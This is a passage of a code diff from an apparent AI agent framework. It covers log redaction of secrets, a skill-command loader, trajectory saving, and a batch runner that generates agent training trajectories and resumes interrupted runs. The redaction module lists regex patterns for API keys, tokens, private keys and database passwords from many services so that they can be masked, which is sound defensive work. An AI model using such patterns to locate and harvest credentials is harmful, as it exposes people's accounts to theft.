r"sk-[A-Za-z0-9_-]{10,}", # OpenAI / OpenRouter / Anthropic (sk-ant-*)
r"ghp_[A-Za-z0-9]{10,}", # GitHub PAT (classic)
r"github_pat_[A-Za-z0-9_]{10,}", # GitHub PAT (fine-grained)
r"xox[baprs]-[A-Za-z0-9-]{10,}", # Slack tokens
r"AIza[A-Za-z0-9_-]{30,}", # Google API keys
r"pplx-[A-Za-z0-9]{10,}", # Perplexity
r"fal_[A-Za-z0-9_-]{10,}", # Fal.ai
r"fc-[A-Za-z0-9]{10,}", # Firecrawl
r"bb_live_[A-Za-z0-9_-]{10,}", # BrowserBase
r"gAAAA[A-Za-z0-9_=-]{20,}", # Codex encrypted tokens
r"AKIA[A-Z0-9]{16}", # AWS Access Key ID
r"sk_live_[A-Za-z0-9]{10,}", # Stripe secret key (live)
r"sk_test_[A-Za-z0-9]{10,}", # Stripe secret key (test)
r"rk_live_[A-Za-z0-9]{10,}", # Stripe restricted key
r"SG\.[A-Za-z0-9_-]{10,}", # SendGrid API key
r"hf_[A-Za-z0-9]{10,}", # HuggingFace token
r"r8_[A-Za-z0-9]{10,}", # Replicate API token
r"npm_[A-Za-z0-9]{10,}", # npm access token
r"pypi-[A-Za-z0-9_-]{10,}", # PyPI API token
r"dop_v1_[A-Za-z0-9]{10,}", # DigitalOcean PAT
r"doo_v1_[A-Za-z0-9]{10,}", # DigitalOcean OAuth
r"am_[A-Za-z0-9_-]{10,}", # AgentMail API key
]
# ENV assignment patterns: KEY=value where KEY contains a secret-like name
_SECRET_ENV_NAMES = r"(?:API_?KEY|TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL|AUTH)"
_ENV_ASSIGN_RE = re.compile(
rf"([A-Z_]*{_SECRET_ENV_NAMES}[A-Z_]*)\s*=\s*(['\"]?)(\S+)\2",
re.IGNORECASE,
)
# JSON field patterns: "apiKey": "value", "token": "value", etc.
_JSON_KEY_NAMES = r"(?:api_?[Kk]ey|token|secret|password|access_token|refresh_token|auth_token|bearer|secret_value|raw_secret|secret_input|key_material)"
_JSON_FIELD_RE = re.compile(
rf'("{_JSON_KEY_NAMES}")\s*:\s*"([^"]+)"',
re.IGNORECASE,
)
# Authorization headers
_AUTH_HEADER_RE = re.compile(
r"(Authorization:\s*Bearer\s+)(\S+)",
re.IGNORECASE,
)
# Telegram bot tokens: bot<digits>:<token> or <digits>:<token>,
# where token part is restricted to [-A-Za-z0-9_] and length >= 30
_TELEGRAM_RE = re.compile(
r"(bot)?(\d{8,}):([-A-Za-z0-9_]{30,})",
)
# Private key blocks: -----BEGIN RSA PRIVATE KEY----- ... -----END RSA PRIVATE KEY-----
_PRIVATE_KEY_RE = re.compile(
r"-----BEGIN[A-Z ]*PRIVATE KEY-----[\s\S]*?-----END[A-Z ]*PRIVATE KEY-----"
)
# Database connection strings: protocol://user:PASSWORD@host
# Catches postgres, mysql, mongodb, redis, amqp URLs and redacts the password
_DB_CONNSTR_RE = re.compile(
r"((?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis|amqp)://[^:]+:)([^@]+)(@)",
re.IGNORECASE,
)
# E.164 phone numbers: +<country><number>, 7-15 digits
# Negative lookahead prevents matching hex strings or identifiers
_SIGNAL_PHONE_RE = re.compile(r"(\+[1-9]\d{6,14})(?![A-Za-z0-9])")
# Compile known prefix patterns into one alternation
_PREFIX_RE = re.compile(
r"(?<![A-Za-z0-9_-])(" + "|".join(_PREFIX_PATTERNS) + r")(?![A-Za-z0-9_-])"
)
def _mask_token(token: str) -> str:
"""Mask a token, preserving prefix for long tokens."""
if len(token) < 18:
return "***"
return f"{token[:6]}...{token[-4:]}"
def redact_sensitive_text(text: str) -> str:
"""Apply all redaction patterns to a block of text.
Safe to call on any string -- non-matching text passes through unchanged.
Disabled when security.redact_secrets is false in config.yaml.
"""
if not text:
return text
if os.getenv("HERMES_REDACT_SECRETS", "").lower() in ("0", "false", "no", "off"):
return text
# Known prefixes (sk-, ghp_, etc.)
text = _PREFIX_RE.sub(lambda m: _mask_token(m.group(1)), text)
# ENV assignments: OPENAI_API_KEY=sk-abc...
def _redact_env(m):
name, quote, value = m.group(1), m.group(2), m.group(3)
return f"{name}={quote}{_mask_token(value)}{quote}"
text = _ENV_ASSIGN_RE.sub(_redact_env, text)
# JSON fields: "apiKey": "value"
def _redact_json(m):
key, value = m.group(1), m.group(2)
return f'{key}: "{_mask_token(value)}"'
text = _JSON_FIELD_RE.sub(_redact_json, text)
# Authorization headers
text = _AUTH_HEADER_RE.sub(
lambda m: m.group(1) + _mask_token(m.group(2)),
text,
)
# Telegram bot tokens
def _redact_telegram(m):
prefix = m.group(1) or ""
digits = m.group(2)
return f"{prefix}{digits}:***"
text = _TELEGRAM_RE.sub(_redact_telegram, text)
# Private key blocks
text = _PRIVATE_KEY_RE.sub("[REDACTED PRIVATE KEY]", text)
# Database connection string passwords
text = _DB_CONNSTR_RE.sub(lambda m: f"{m.group(1)}***{m.group(3)}", text)
# E.164 phone numbers (Signal, WhatsApp)
def _redact_phone(m):
phone = m.group(1)
if len(phone) <= 8:
return phone[:2] + "****" + phone[-2:]
return phone[:4] + "****" + phone[-4:]
text = _SIGNAL_PHONE_RE.sub(_redact_phone, text)
return text
class RedactingFormatter(logging.Formatter):
"""Log formatter that redacts secrets from all log messages."""
def __init__(self, fmt=None, datefmt=None, style='%', **kwargs):
super().__init__(fmt, datefmt, style, **kwargs)
def format(self, record: logging.LogRecord) -> str:
original = super().format(record)
return redact_sensitive_text(original)

159
agent/skill_commands.py Normal file
View File

@@ -0,0 +1,159 @@
"""Skill slash commands — scan installed skills and build invocation messages.
Shared between CLI (cli.py) and gateway (gateway/run.py) so both surfaces
can invoke skills via /skill-name commands.
"""
import json
import logging
from pathlib import Path
from typing import Any, Dict, Optional
logger = logging.getLogger(__name__)
_skill_commands: Dict[str, Dict[str, Any]] = {}
def scan_skill_commands() -> Dict[str, Dict[str, Any]]:
"""Scan ~/.hermes/skills/ and return a mapping of /command -> skill info.
Returns:
Dict mapping "/skill-name" to {name, description, skill_md_path, skill_dir}.
"""
global _skill_commands
_skill_commands = {}
try:
from tools.skills_tool import SKILLS_DIR, _parse_frontmatter, skill_matches_platform
if not SKILLS_DIR.exists():
return _skill_commands
for skill_md in SKILLS_DIR.rglob("SKILL.md"):
if any(part in ('.git', '.github', '.hub') for part in skill_md.parts):
continue
try:
content = skill_md.read_text(encoding='utf-8')
frontmatter, body = _parse_frontmatter(content)
# Skip skills incompatible with the current OS platform
if not skill_matches_platform(frontmatter):
continue
name = frontmatter.get('name', skill_md.parent.name)
description = frontmatter.get('description', '')
if not description:
for line in body.strip().split('\n'):
line = line.strip()
if line and not line.startswith('#'):
description = line[:80]
break
cmd_name = name.lower().replace(' ', '-').replace('_', '-')
_skill_commands[f"/{cmd_name}"] = {
"name": name,
"description": description or f"Invoke the {name} skill",
"skill_md_path": str(skill_md),
"skill_dir": str(skill_md.parent),
}
except Exception:
continue
except Exception:
pass
return _skill_commands
def get_skill_commands() -> Dict[str, Dict[str, Any]]:
"""Return the current skill commands mapping (scan first if empty)."""
if not _skill_commands:
scan_skill_commands()
return _skill_commands
def build_skill_invocation_message(
cmd_key: str,
user_instruction: str = "",
task_id: str | None = None,
) -> Optional[str]:
"""Build the user message content for a skill slash command invocation.
Args:
cmd_key: The command key including leading slash (e.g., "/gif-search").
user_instruction: Optional text the user typed after the command.
Returns:
The formatted message string, or None if the skill wasn't found.
"""
commands = get_skill_commands()
skill_info = commands.get(cmd_key)
if not skill_info:
return None
skill_name = skill_info["name"]
skill_path = skill_info["skill_dir"]
try:
from tools.skills_tool import SKILLS_DIR, skill_view
loaded_skill = json.loads(skill_view(skill_path, task_id=task_id))
except Exception:
return f"[Failed to load skill: {skill_name}]"
if not loaded_skill.get("success"):
return f"[Failed to load skill: {skill_name}]"
content = str(loaded_skill.get("content") or "")
skill_dir = Path(skill_info["skill_dir"])
parts = [
f'[SYSTEM: The user has invoked the "{skill_name}" skill, indicating they want you to follow its instructions. The full skill content is loaded below.]',
"",
content.strip(),
]
if loaded_skill.get("setup_skipped"):
parts.extend(
[
"",
"[Skill setup note: Required environment setup was skipped. Continue loading the skill and explain any reduced functionality if it matters.]",
]
)
elif loaded_skill.get("gateway_setup_hint"):
parts.extend(
[
"",
f"[Skill setup note: {loaded_skill['gateway_setup_hint']}]",
]
)
elif loaded_skill.get("setup_needed") and loaded_skill.get("setup_note"):
parts.extend(
[
"",
f"[Skill setup note: {loaded_skill['setup_note']}]",
]
)
supporting = []
linked_files = loaded_skill.get("linked_files") or {}
for entries in linked_files.values():
if isinstance(entries, list):
supporting.extend(entries)
if not supporting:
for subdir in ("references", "templates", "scripts", "assets"):
subdir_path = skill_dir / subdir
if subdir_path.exists():
for f in sorted(subdir_path.rglob("*")):
if f.is_file():
rel = str(f.relative_to(skill_dir))
supporting.append(rel)
if supporting:
skill_view_target = str(Path(skill_path).relative_to(SKILLS_DIR))
parts.append("")
parts.append("[This skill has supporting files you can load with the skill_view tool:]")
for sf in supporting:
parts.append(f"- {sf}")
parts.append(
f'\nTo view any of these, use: skill_view(name="{skill_view_target}", file_path="<path>")'
)
if user_instruction:
parts.append("")
parts.append(f"The user has provided the following instruction alongside the skill invocation: {user_instruction}")
return "\n".join(parts)

56
agent/trajectory.py Normal file
View File

@@ -0,0 +1,56 @@
"""Trajectory saving utilities and static helpers.
_convert_to_trajectory_format stays as an AIAgent method (batch_runner.py
calls agent._convert_to_trajectory_format). Only the static helpers and
the file-write logic live here.
"""
import json
import logging
from datetime import datetime
from typing import Any, Dict, List
logger = logging.getLogger(__name__)
def convert_scratchpad_to_think(content: str) -> str:
"""Convert <REASONING_SCRATCHPAD> tags to <think> tags."""
if not content or "<REASONING_SCRATCHPAD>" not in content:
return content
return content.replace("<REASONING_SCRATCHPAD>", "<think>").replace("</REASONING_SCRATCHPAD>", "</think>")
def has_incomplete_scratchpad(content: str) -> bool:
"""Check if content has an opening <REASONING_SCRATCHPAD> without a closing tag."""
if not content:
return False
return "<REASONING_SCRATCHPAD>" in content and "</REASONING_SCRATCHPAD>" not in content
def save_trajectory(trajectory: List[Dict[str, Any]], model: str,
completed: bool, filename: str = None):
"""Append a trajectory entry to a JSONL file.
Args:
trajectory: The ShareGPT-format conversation list.
model: Model name for metadata.
completed: Whether the conversation completed successfully.
filename: Override output filename. Defaults to trajectory_samples.jsonl
or failed_trajectories.jsonl based on ``completed``.
"""
if filename is None:
filename = "trajectory_samples.jsonl" if completed else "failed_trajectories.jsonl"
entry = {
"conversations": trajectory,
"timestamp": datetime.now().isoformat(),
"model": model,
"completed": completed,
}
try:
with open(filename, "a", encoding="utf-8") as f:
f.write(json.dumps(entry, ensure_ascii=False) + "\n")
logger.info("Trajectory saved to %s", filename)
except Exception as e:
logger.warning("Failed to save trajectory: %s", e)

BIN
assets/banner.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 12 KiB

View File

@@ -27,23 +27,87 @@ import time
from pathlib import Path
from typing import List, Dict, Any, Optional, Tuple
from datetime import datetime
from multiprocessing import Pool, Manager, Lock
from multiprocessing import Pool, Lock
import traceback
from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn, TimeRemainingColumn, MofNCompleteColumn
from rich.console import Console
import fire
from run_agent import AIAgent
from toolset_distributions import (
get_distribution,
list_distributions,
sample_toolsets_from_distribution,
validate_distribution
)
from model_tools import TOOL_TO_TOOLSET_MAP
# Global configuration for worker processes
_WORKER_CONFIG = {}
# All possible tools - auto-derived from the master mapping in model_tools.py.
# This stays in sync automatically when new tools are added to TOOL_TO_TOOLSET_MAP.
# Used for consistent schema in Arrow/Parquet (HuggingFace datasets) and for
# filtering corrupted entries during trajectory combination.
ALL_POSSIBLE_TOOLS = set(TOOL_TO_TOOLSET_MAP.keys())
# Default stats for tools that weren't used
DEFAULT_TOOL_STATS = {'count': 0, 'success': 0, 'failure': 0}
def _normalize_tool_stats(tool_stats: Dict[str, Dict[str, int]]) -> Dict[str, Dict[str, int]]:
"""
Normalize tool_stats to include all possible tools with consistent schema.
This ensures HuggingFace datasets can load the JSONL without schema mismatch errors.
Tools that weren't used get zero counts.
Args:
tool_stats (Dict): Raw tool statistics from extraction
Returns:
Dict: Normalized tool statistics with all tools present
"""
normalized = {}
# Add all possible tools with defaults
for tool in ALL_POSSIBLE_TOOLS:
if tool in tool_stats:
normalized[tool] = tool_stats[tool].copy()
else:
normalized[tool] = DEFAULT_TOOL_STATS.copy()
# Also include any unexpected tools (in case new tools are added)
for tool, stats in tool_stats.items():
if tool not in normalized:
normalized[tool] = stats.copy()
return normalized
def _normalize_tool_error_counts(tool_error_counts: Dict[str, int]) -> Dict[str, int]:
"""
Normalize tool_error_counts to include all possible tools.
Args:
tool_error_counts (Dict): Raw error counts mapping
Returns:
Dict: Normalized error counts with all tools present
"""
normalized = {}
# Add all possible tools with zero defaults
for tool in ALL_POSSIBLE_TOOLS:
normalized[tool] = tool_error_counts.get(tool, 0)
# Also include any unexpected tools
for tool, count in tool_error_counts.items():
if tool not in normalized:
normalized[tool] = count
return normalized
def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, int]]:
"""
@@ -107,7 +171,7 @@ def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, i
if content_json.get("success") is False:
is_success = False
except:
except (json.JSONDecodeError, ValueError, TypeError):
# If not JSON, check if content is empty or explicitly states an error
# Note: We avoid simple substring matching to prevent false positives
if not content:
@@ -127,6 +191,42 @@ def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, i
return tool_stats
def _extract_reasoning_stats(messages: List[Dict[str, Any]]) -> Dict[str, int]:
"""
Count how many assistant turns have reasoning vs no reasoning.
Checks for <REASONING_SCRATCHPAD> in content or a non-empty 'reasoning' field
(native thinking tokens). Returns counts for tracking reasoning coverage.
Args:
messages: Message history
Returns:
Dict with 'total_assistant_turns', 'turns_with_reasoning', 'turns_without_reasoning'
"""
total = 0
with_reasoning = 0
for msg in messages:
if msg.get("role") != "assistant":
continue
total += 1
content = msg.get("content", "") or ""
has_scratchpad = "<REASONING_SCRATCHPAD>" in content
has_native_reasoning = bool(msg.get("reasoning", "").strip()) if msg.get("reasoning") else False
if has_scratchpad or has_native_reasoning:
with_reasoning += 1
return {
"total_assistant_turns": total,
"turns_with_reasoning": with_reasoning,
"turns_without_reasoning": total - with_reasoning,
"has_any_reasoning": with_reasoning > 0,
}
def _process_single_prompt(
prompt_index: int,
prompt_data: Dict[str, Any],
@@ -138,7 +238,7 @@ def _process_single_prompt(
Args:
prompt_index (int): Index of prompt in dataset
prompt_data (Dict): Prompt data containing 'prompt' field
prompt_data (Dict): Prompt data containing 'prompt' field and optional 'image' field
batch_num (int): Batch number
config (Dict): Configuration dict with agent parameters
@@ -146,6 +246,58 @@ def _process_single_prompt(
Dict: Result containing trajectory, stats, and metadata
"""
prompt = prompt_data["prompt"]
task_id = f"task_{prompt_index}"
# Per-prompt container image override: if the dataset row has an 'image' field,
# register it for this task's sandbox. Works with Docker, Modal, Singularity, and Daytona.
container_image = prompt_data.get("image") or prompt_data.get("docker_image")
if container_image:
# Verify the image is accessible before spending tokens on the agent loop.
# For Docker: check local cache, then try pulling.
# For Modal: skip local check (Modal pulls server-side).
env_type = os.getenv("TERMINAL_ENV", "local")
if env_type == "docker":
import subprocess as _sp
try:
probe = _sp.run(
["docker", "image", "inspect", container_image],
capture_output=True, timeout=10,
)
if probe.returncode != 0:
if config.get("verbose"):
print(f" Prompt {prompt_index}: Pulling docker image {container_image}...", flush=True)
pull = _sp.run(
["docker", "pull", container_image],
capture_output=True, text=True, timeout=600,
)
if pull.returncode != 0:
return {
"success": False,
"prompt_index": prompt_index,
"error": f"Docker image not available: {container_image}\n{pull.stderr[:500]}",
"trajectory": None,
"tool_stats": {},
"toolsets_used": [],
"metadata": {"batch_num": batch_num, "timestamp": datetime.now().isoformat()},
}
except FileNotFoundError:
pass # Docker CLI not installed — skip check (e.g., Modal backend)
except Exception as img_err:
if config.get("verbose"):
print(f" Prompt {prompt_index}: Docker image check failed: {img_err}", flush=True)
from tools.terminal_tool import register_task_env_overrides
overrides = {
"docker_image": container_image,
"modal_image": container_image,
"singularity_image": f"docker://{container_image}",
"daytona_image": container_image,
}
if prompt_data.get("cwd"):
overrides["cwd"] = prompt_data["cwd"]
register_task_env_overrides(task_id, overrides)
if config.get("verbose"):
print(f" Prompt {prompt_index}: Using container image {container_image}")
try:
# Sample toolsets from distribution for this prompt
@@ -154,7 +306,8 @@ def _process_single_prompt(
if config.get("verbose"):
print(f" Prompt {prompt_index}: Using toolsets {selected_toolsets}")
# Initialize agent with sampled toolsets
# Initialize agent with sampled toolsets and log prefix for identification
log_prefix = f"[B{batch_num}:P{prompt_index}]"
agent = AIAgent(
base_url=config.get("base_url"),
api_key=config.get("api_key"),
@@ -164,15 +317,28 @@ def _process_single_prompt(
save_trajectories=False, # We handle saving ourselves
verbose_logging=config.get("verbose", False),
ephemeral_system_prompt=config.get("ephemeral_system_prompt"),
log_prefix_chars=config.get("log_prefix_chars", 100)
log_prefix_chars=config.get("log_prefix_chars", 100),
log_prefix=log_prefix,
providers_allowed=config.get("providers_allowed"),
providers_ignored=config.get("providers_ignored"),
providers_order=config.get("providers_order"),
provider_sort=config.get("provider_sort"),
max_tokens=config.get("max_tokens"),
reasoning_config=config.get("reasoning_config"),
prefill_messages=config.get("prefill_messages"),
skip_context_files=True, # Don't pollute trajectories with SOUL.md/AGENTS.md
skip_memory=True, # Don't use persistent memory in batch runs
)
# Run the agent with task_id to ensure each task gets its own isolated VM
result = agent.run_conversation(prompt, task_id=f"task_{prompt_index}")
result = agent.run_conversation(prompt, task_id=task_id)
# Extract tool usage statistics
tool_stats = _extract_tool_stats(result["messages"])
# Extract reasoning coverage stats
reasoning_stats = _extract_reasoning_stats(result["messages"])
# Convert to trajectory format (using existing method)
trajectory = agent._convert_to_trajectory_format(
result["messages"],
@@ -185,7 +351,9 @@ def _process_single_prompt(
"prompt_index": prompt_index,
"trajectory": trajectory,
"tool_stats": tool_stats,
"reasoning_stats": reasoning_stats,
"completed": result["completed"],
"partial": result.get("partial", False),
"api_calls": result["api_calls"],
"toolsets_used": selected_toolsets,
"metadata": {
@@ -252,7 +420,9 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
# Initialize aggregated stats for this batch
batch_tool_stats = {}
batch_reasoning_stats = {"total_assistant_turns": 0, "turns_with_reasoning": 0, "turns_without_reasoning": 0}
completed_in_batch = []
discarded_no_reasoning = 0
# Process each prompt sequentially in this batch
for prompt_index, prompt_data in prompts_to_process:
@@ -266,13 +436,34 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
# Save trajectory if successful
if result["success"] and result["trajectory"]:
# Discard samples with zero reasoning across all turns
reasoning = result.get("reasoning_stats", {})
if not reasoning.get("has_any_reasoning", True):
print(f" 🚫 Prompt {prompt_index} discarded (no reasoning in any turn)")
discarded_no_reasoning += 1
continue
# Get and normalize tool stats for consistent schema across all entries
raw_tool_stats = result.get("tool_stats", {})
tool_stats = _normalize_tool_stats(raw_tool_stats)
# Create normalized tool_error_counts mapping tool names to their failure counts
raw_error_counts = {
tool_name: stats.get("failure", 0)
for tool_name, stats in raw_tool_stats.items()
}
tool_error_counts = _normalize_tool_error_counts(raw_error_counts)
trajectory_entry = {
"prompt_index": prompt_index,
"conversations": result["trajectory"],
"metadata": result["metadata"],
"completed": result["completed"],
"partial": result.get("partial", False), # True if stopped due to invalid tool calls
"api_calls": result["api_calls"],
"toolsets_used": result["toolsets_used"]
"toolsets_used": result["toolsets_used"],
"tool_stats": tool_stats, # Full stats: {tool: {count, success, failure}} - normalized
"tool_error_counts": tool_error_counts # Simple: {tool: failure_count} - normalized
}
# Append to batch output file
@@ -292,8 +483,17 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
batch_tool_stats[tool_name]["success"] += stats["success"]
batch_tool_stats[tool_name]["failure"] += stats["failure"]
completed_in_batch.append(prompt_index)
print(f" ✅ Prompt {prompt_index} completed")
# Aggregate reasoning stats
for key in batch_reasoning_stats:
batch_reasoning_stats[key] += result.get("reasoning_stats", {}).get(key, 0)
# Only mark as completed if successfully saved (failed prompts can be retried on resume)
if result["success"] and result["trajectory"]:
completed_in_batch.append(prompt_index)
status = "⚠️ partial" if result.get("partial") else ""
print(f" {status} Prompt {prompt_index} completed")
else:
print(f" ❌ Prompt {prompt_index} failed (will retry on resume)")
print(f"✅ Batch {batch_num}: Completed ({len(prompts_to_process)} prompts processed)")
@@ -302,6 +502,8 @@ def _process_batch_worker(args: Tuple) -> Dict[str, Any]:
"processed": len(prompts_to_process),
"skipped": len(batch_data) - len(prompts_to_process),
"tool_stats": batch_tool_stats,
"reasoning_stats": batch_reasoning_stats,
"discarded_no_reasoning": discarded_no_reasoning,
"completed_prompts": completed_in_batch
}
@@ -325,6 +527,14 @@ class BatchRunner:
verbose: bool = False,
ephemeral_system_prompt: str = None,
log_prefix_chars: int = 100,
providers_allowed: List[str] = None,
providers_ignored: List[str] = None,
providers_order: List[str] = None,
provider_sort: str = None,
max_tokens: int = None,
reasoning_config: Dict[str, Any] = None,
prefill_messages: List[Dict[str, Any]] = None,
max_samples: int = None,
):
"""
Initialize the batch runner.
@@ -342,6 +552,14 @@ class BatchRunner:
verbose (bool): Enable verbose logging
ephemeral_system_prompt (str): System prompt used during agent execution but NOT saved to trajectories (optional)
log_prefix_chars (int): Number of characters to show in log previews for tool calls/responses (default: 20)
providers_allowed (List[str]): OpenRouter providers to allow (optional)
providers_ignored (List[str]): OpenRouter providers to ignore (optional)
providers_order (List[str]): OpenRouter providers to try in order (optional)
provider_sort (str): Sort providers by price/throughput/latency (optional)
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_config (Dict): OpenRouter reasoning config override (e.g. {"effort": "none"} to disable thinking)
prefill_messages (List[Dict]): Messages to prepend as prefilled conversation context (few-shot priming)
max_samples (int): Only process the first N samples from the dataset (optional, processes all if not set)
"""
self.dataset_file = Path(dataset_file)
self.batch_size = batch_size
@@ -355,6 +573,14 @@ class BatchRunner:
self.verbose = verbose
self.ephemeral_system_prompt = ephemeral_system_prompt
self.log_prefix_chars = log_prefix_chars
self.providers_allowed = providers_allowed
self.providers_ignored = providers_ignored
self.providers_order = providers_order
self.provider_sort = provider_sort
self.max_tokens = max_tokens
self.reasoning_config = reasoning_config
self.prefill_messages = prefill_messages
self.max_samples = max_samples
# Validate distribution
if not validate_distribution(distribution):
@@ -370,13 +596,17 @@ class BatchRunner:
# Statistics file
self.stats_file = self.output_dir / "statistics.json"
# Load dataset
# Load dataset (and optionally truncate to max_samples)
self.dataset = self._load_dataset()
if self.max_samples and self.max_samples < len(self.dataset):
full_count = len(self.dataset)
self.dataset = self.dataset[:self.max_samples]
print(f"✂️ Truncated dataset from {full_count} to {self.max_samples} samples (--max_samples)")
# Create batches
self.batches = self._create_batches()
print(f"📊 Batch Runner Initialized")
print("📊 Batch Runner Initialized")
print(f" Dataset: {self.dataset_file} ({len(self.dataset)} prompts)")
print(f" Batch size: {self.batch_size}")
print(f" Total batches: {len(self.batches)}")
@@ -470,15 +700,91 @@ class BatchRunner:
lock (Lock): Optional lock for thread-safe access
"""
checkpoint_data["last_updated"] = datetime.now().isoformat()
from utils import atomic_json_write
if lock:
with lock:
with open(self.checkpoint_file, 'w', encoding='utf-8') as f:
json.dump(checkpoint_data, f, indent=2, ensure_ascii=False)
atomic_json_write(self.checkpoint_file, checkpoint_data)
else:
with open(self.checkpoint_file, 'w', encoding='utf-8') as f:
json.dump(checkpoint_data, f, indent=2, ensure_ascii=False)
atomic_json_write(self.checkpoint_file, checkpoint_data)
def _scan_completed_prompts_by_content(self) -> set:
"""
Scan all batch files and extract completed prompts by their actual content.
This provides a more robust resume mechanism that matches on prompt text
rather than indices, allowing recovery even if indices don't match.
Returns:
set: Set of prompt texts that have been successfully processed
"""
completed_prompts = set()
batch_files = sorted(self.output_dir.glob("batch_*.jsonl"))
if not batch_files:
return completed_prompts
print(f"📂 Scanning {len(batch_files)} batch files for completed prompts...")
for batch_file in batch_files:
try:
with open(batch_file, 'r', encoding='utf-8') as f:
for line in f:
try:
entry = json.loads(line.strip())
# Skip failed entries - we want to retry these
if entry.get("failed", False):
continue
# Extract the human/user prompt from conversations
conversations = entry.get("conversations", [])
for msg in conversations:
if msg.get("from") == "human":
prompt_text = msg.get("value", "").strip()
if prompt_text:
completed_prompts.add(prompt_text)
break # Only need the first human message
except json.JSONDecodeError:
continue
except Exception as e:
print(f" ⚠️ Warning: Error reading {batch_file.name}: {e}")
return completed_prompts
def _filter_dataset_by_completed(self, completed_prompts: set) -> Tuple[List[Dict], List[int]]:
"""
Filter the dataset to exclude prompts that have already been completed.
Args:
completed_prompts: Set of prompt texts that have been completed
Returns:
Tuple of (filtered_dataset, skipped_indices)
"""
filtered_dataset = []
skipped_indices = []
for idx, entry in enumerate(self.dataset):
# Extract prompt from the dataset entry
prompt_text = entry.get("prompt", "").strip()
# Also check conversations format
if not prompt_text:
conversations = entry.get("conversations", [])
for msg in conversations:
role = msg.get("role") or msg.get("from")
if role in ("user", "human"):
prompt_text = (msg.get("content") or msg.get("value", "")).strip()
break
if prompt_text in completed_prompts:
skipped_indices.append(idx)
else:
# Keep original index for tracking
filtered_dataset.append((idx, entry))
return filtered_dataset, skipped_indices
def run(self, resume: bool = False):
"""
@@ -491,16 +797,49 @@ class BatchRunner:
print("🚀 Starting Batch Processing")
print("=" * 70)
# Load checkpoint
checkpoint_data = self._load_checkpoint() if resume else {
"run_name": self.run_name,
"completed_prompts": [],
"batch_stats": {},
"last_updated": None
}
# Smart resume: scan batch files by content to find completed prompts
completed_prompt_texts = set()
if resume:
completed_prompt_texts = self._scan_completed_prompts_by_content()
if completed_prompt_texts:
print(f" Found {len(completed_prompt_texts)} already-completed prompts by content matching")
if resume and checkpoint_data.get("completed_prompts"):
print(f"📂 Resuming from checkpoint ({len(checkpoint_data['completed_prompts'])} prompts already completed)")
# Filter dataset to only include unprocessed prompts
if resume and completed_prompt_texts:
filtered_entries, skipped_indices = self._filter_dataset_by_completed(completed_prompt_texts)
if not filtered_entries:
print("\n✅ All prompts have already been processed!")
return
# Recreate batches from filtered entries (keeping original indices for tracking)
batches_to_process = []
for i in range(0, len(filtered_entries), self.batch_size):
batch = filtered_entries[i:i + self.batch_size]
batches_to_process.append(batch)
self.batches = batches_to_process
# Print prominent resume summary
print("\n" + "=" * 70)
print("📊 RESUME SUMMARY")
print("=" * 70)
print(f" Original dataset size: {len(self.dataset):,} prompts")
print(f" Already completed: {len(skipped_indices):,} prompts")
print(" ─────────────────────────────────────────")
print(f" 🎯 RESUMING WITH: {len(filtered_entries):,} prompts")
print(f" New batches created: {len(batches_to_process)}")
print("=" * 70 + "\n")
# Load existing checkpoint (so resume doesn't clobber prior progress)
checkpoint_data = self._load_checkpoint()
if checkpoint_data.get("run_name") != self.run_name:
checkpoint_data = {
"run_name": self.run_name,
"completed_prompts": [],
"batch_stats": {},
"last_updated": None
}
# Prepare configuration for workers
config = {
@@ -511,10 +850,17 @@ class BatchRunner:
"api_key": self.api_key,
"verbose": self.verbose,
"ephemeral_system_prompt": self.ephemeral_system_prompt,
"log_prefix_chars": self.log_prefix_chars
"log_prefix_chars": self.log_prefix_chars,
"providers_allowed": self.providers_allowed,
"providers_ignored": self.providers_ignored,
"providers_order": self.providers_order,
"provider_sort": self.provider_sort,
"max_tokens": self.max_tokens,
"reasoning_config": self.reasoning_config,
"prefill_messages": self.prefill_messages,
}
# Get completed prompts set
# For backward compatibility, still track by index (but this is secondary to content matching)
completed_prompts_set = set(checkpoint_data.get("completed_prompts", []))
# Aggregate statistics across all batches
@@ -522,6 +868,11 @@ class BatchRunner:
start_time = time.time()
print(f"\n🔧 Initializing {self.num_workers} worker processes...")
# Checkpoint writes happen in the parent process; keep a lock for safety.
checkpoint_lock = Lock()
# Process batches in parallel
with Pool(processes=self.num_workers) as pool:
# Create tasks for each batch
@@ -536,11 +887,66 @@ class BatchRunner:
for batch_num, batch_data in enumerate(self.batches)
]
# Use map to process batches in parallel
results = pool.map(_process_batch_worker, tasks)
print(f"✅ Created {len(tasks)} batch tasks")
print("🚀 Starting parallel batch processing...\n")
# Use rich Progress for better visual tracking with persistent bottom bar
# redirect_stdout/stderr lets rich manage all output so progress bar stays clean
results = []
console = Console(force_terminal=True)
with Progress(
SpinnerColumn(),
TextColumn("[bold blue]📦 Batches"),
BarColumn(bar_width=40),
MofNCompleteColumn(),
TextColumn(""),
TimeRemainingColumn(),
console=console,
refresh_per_second=2,
transient=False,
redirect_stdout=False,
redirect_stderr=False,
) as progress:
task = progress.add_task("Processing", total=len(tasks))
# Temporarily suppress DEBUG logging to avoid bar interference
root_logger = logging.getLogger()
original_level = root_logger.level
root_logger.setLevel(logging.WARNING)
try:
for result in pool.imap_unordered(_process_batch_worker, tasks):
results.append(result)
progress.update(task, advance=1)
# Incremental checkpoint update (so resume works after crash)
try:
batch_num = result.get('batch_num')
completed = result.get('completed_prompts', []) or []
completed_prompts_set.update(completed)
if isinstance(batch_num, int):
checkpoint_data.setdefault('batch_stats', {})[str(batch_num)] = {
'processed': result.get('processed', 0),
'skipped': result.get('skipped', 0),
'discarded_no_reasoning': result.get('discarded_no_reasoning', 0),
}
checkpoint_data['completed_prompts'] = sorted(completed_prompts_set)
self._save_checkpoint(checkpoint_data, lock=checkpoint_lock)
except Exception as ckpt_err:
# Don't fail the run if checkpoint write fails
print(f"⚠️ Warning: Failed to save incremental checkpoint: {ckpt_err}")
except Exception as e:
